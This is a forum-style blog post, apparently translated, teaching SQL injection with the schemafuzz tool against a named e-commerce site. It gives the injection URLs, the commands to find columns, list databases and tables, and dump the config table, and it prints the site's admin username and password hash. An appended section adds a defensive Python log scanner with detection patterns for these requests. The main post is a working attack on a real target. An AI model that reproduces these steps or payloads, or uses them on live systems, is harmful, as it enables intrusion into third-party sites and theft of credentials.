





Thursday, 08 April 2010 - 22:14:25 WIB
Dissecting a web site...
Posted by: eko wahyudi s
Category: Miscellaneous
- Read: 99 times
Source: d1gdo dot com
What you need to prepare:
1. Python, download it here
2. Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py
3. CMD
Open CMD and change into the folder that contains schemafuzz.py.
The command form is >> schemafuzz.py -u "target" --perintah (where "perintah" stands for one of the commands listed at the end)
To make it clearer, let's go straight to the scene, lol.
1. Find a target; this is our target >>>
http://www.sleeppost.com/viewproduct.php?pid=923
2. Check its columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol
This prints:
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
[+] Evasion Used: "+" "--"
[+] 09:44:10
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6--
[+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
[-] Done!
Now we use this URL for the injection:
http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
3. Find its database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dbs
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done
See, the database name is now visible, lol: sleeppo_store
4. Find the table names in the database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogin,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebheader,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demail,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,survey,qty
[-] 10:24:51
[-] Total URL Requests 139
[-] Done
So the site has 20 tables, and their columns are listed too. Just pick which one to exploit.
5. Exploit a table and its columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3
[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done
Hehe... the user and password are now visible; the password just needs to be decrypted.
The method above applies to SQL version 5; for version 4, use the --fuzz command to find the table and column names.
e.g.:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --fuzz
Some commands:
--fuzz >>> find column and table names on SQL v4
--schema >>> view the table names
--dump >>> view the contents of columns
--findcol >>> find the darkc0de (column)
Go look for the others yourself. Just read the help.
Hope this is useful.
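
A defender's view of the requests shown in steps 2 to 5, as an added example that is not part of the original post or of schemafuzz: a Python scan of web access logs for the patterns visible in the tool output above (a non-numeric pid, AND 1=2, UNION SELECT followed by a column list, a trailing --, and the darkc0de marker). The log lines, IP addresses, rule names and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in Apache common-log style (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [08/Apr/2010:09:44:09 +0700] "GET /viewproduct.php?pid=923 HTTP/1.1" 200 5120
192.0.2.44 - - [08/Apr/2010:09:44:10 +0700] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6-- HTTP/1.1" 200 4010
192.0.2.44 - - [08/Apr/2010:09:56:47 +0700] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6-- HTTP/1.1" 200 4010
198.51.100.9 - - [08/Apr/2010:10:01:00 +0700] "GET /news.php?title=credit+union+select+committee HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rules run on the decoded parameter value ("+" and %xx already turned back into text).
RULES = {
    # UNION SELECT followed by a comma-separated list, so plain prose does not match
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\s+[^,\s]+\s*,", re.I),
    # AND n=m with n != m, used to blank out the page's own result row
    "false_condition": re.compile(r"\band\s+(\d+)\s*=\s*(?!\1\b)\d+", re.I),
    # SQL comment that cuts off the rest of the server's query
    "trailing_comment": re.compile(r"--\s*$"),
    # marker string the tool plants in the injectable column
    "tool_marker": re.compile(r"darkc0de", re.I),
}

def scan(log_text, numeric_params=("pid",)):
    """Return {client_ip: Counter(rule -> hits)} for requests that trip a rule."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        _, _, query = target.partition("?")
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")   # split on the first "=" only
            value = unquote_plus(raw)
            hits = [rule for rule, rx in RULES.items() if rx.search(value)]
            if name in numeric_params and not value.isdigit():
                hits.append("non_numeric_id")    # an ID parameter should be digits only
            if hits:
                findings.setdefault(ip, Counter()).update(hits)
    return findings

def suspects(findings, min_rules=2):
    """Clients whose requests tripped at least min_rules distinct rules."""
    return sorted(ip for ip, c in findings.items() if len(c) >= min_rules)
```

Detection only tells you the probing happened; the fix for a page like viewproduct.php is to bind pid as an integer parameter in a prepared statement instead of concatenating it into the query.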




